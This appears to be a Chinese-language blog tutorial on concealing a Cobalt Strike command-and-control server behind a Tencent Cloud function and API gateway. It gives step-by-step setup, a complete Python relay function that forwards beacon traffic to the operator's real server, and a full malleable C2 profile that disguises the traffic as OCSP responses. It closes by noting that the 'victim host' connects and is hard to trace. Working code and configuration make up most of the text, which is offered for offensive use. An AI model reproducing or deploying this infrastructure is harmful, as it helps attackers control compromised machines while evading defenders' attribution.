Cobaltstrike雲函數隱匿
前言
Cobaltstrike隱匿技術,一直是我比較在意的一個點。之前研究過域前置技術,但是先做由於各大雲服務器廠商的一些策略,實行起來逐漸困難。今天記錄一下如何使用騰訊雲進行雲函數隱匿。
正文
首先創建一個雲函數,創建方式選擇自定義創建即可
然后進入函數,選擇觸發管理,創建觸發器,觸發方式為API網關
隨后點擊API服務名,進入API服務,選擇編輯,將配置改成如下選項:
立即發布即可,但請在API基本信息這里關注默認訪問地址,在之后的設置中會用到
隨后返回雲函數管理,選擇修改函數代碼,將內容改成如下即可
# -*- coding: utf8 -*-
import json,requests,base64
def main_handler(event, context):
response = {}
path = None
headers = None
try:
C2='http://IP:PORT'
if 'path' in event.keys():
path=event['path']
if 'headers' in event.keys():
headers=event['headers']
if 'httpMethod' in event.keys() and event['httpMethod'] == 'GET' :
resp=requests.get(C2+path,headers=headers,verify=False)
else:
resp=requests.post(C2+path,data=event['body'],headers=headers,verify=False)
print(resp.headers)
print(resp.content)
response={
"isBase64Encoded": True,
"statusCode": resp.status_code,
"headers": dict(resp.headers),
"body": str(base64.b64encode(resp.content))[2:-1]
}
except Exception as e:
print(e)
finally:
return response
部署發布即可,隨后在服務器的Cobaltstrike目錄下,新建cloud.profile文件,內容如下
set sleeptime "5000";
set jitter "0";
set maxdns "255";
set useragent "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:80.0) Gecko/20100101 Firefox/80.0";
http-get {
set uri "/api/x";
client {
header "Accept" "*/*";
metadata {
base64;
prepend "SESSIONID=";
header "Cookie";
}
}
server {
header "Content-Type" "application/ocsp-response";
header "content-transfer-encoding" "binary";
header "Server" "nginx";
output {
base64;
print;
}
}
}
http-stager {
set uri_x86 "/vue.min.js";
set uri_x64 "/bootstrap-2.min.js";
}
http-post {
set uri "/api/y";
client {
header "Accept" "*/*";
id {
base64;
prepend "JSESSION=";
header "Cookie";
}
output {
base64;
print;
}
}
server {
header "Content-Type" "application/ocsp-response";
header "content-transfer-encoding" "binary";
header "Connection" "keep-alive";
output {
base64;
print;
}
}
}
隨后打開Cobaltstrike,創建監聽器,HTTP HOST為之前記錄的API網關地址,注意是80端口的那個。
隨后受害主機正常上線,但是已經經歷了雲函數隱匿,很難被溯源到真實地址。
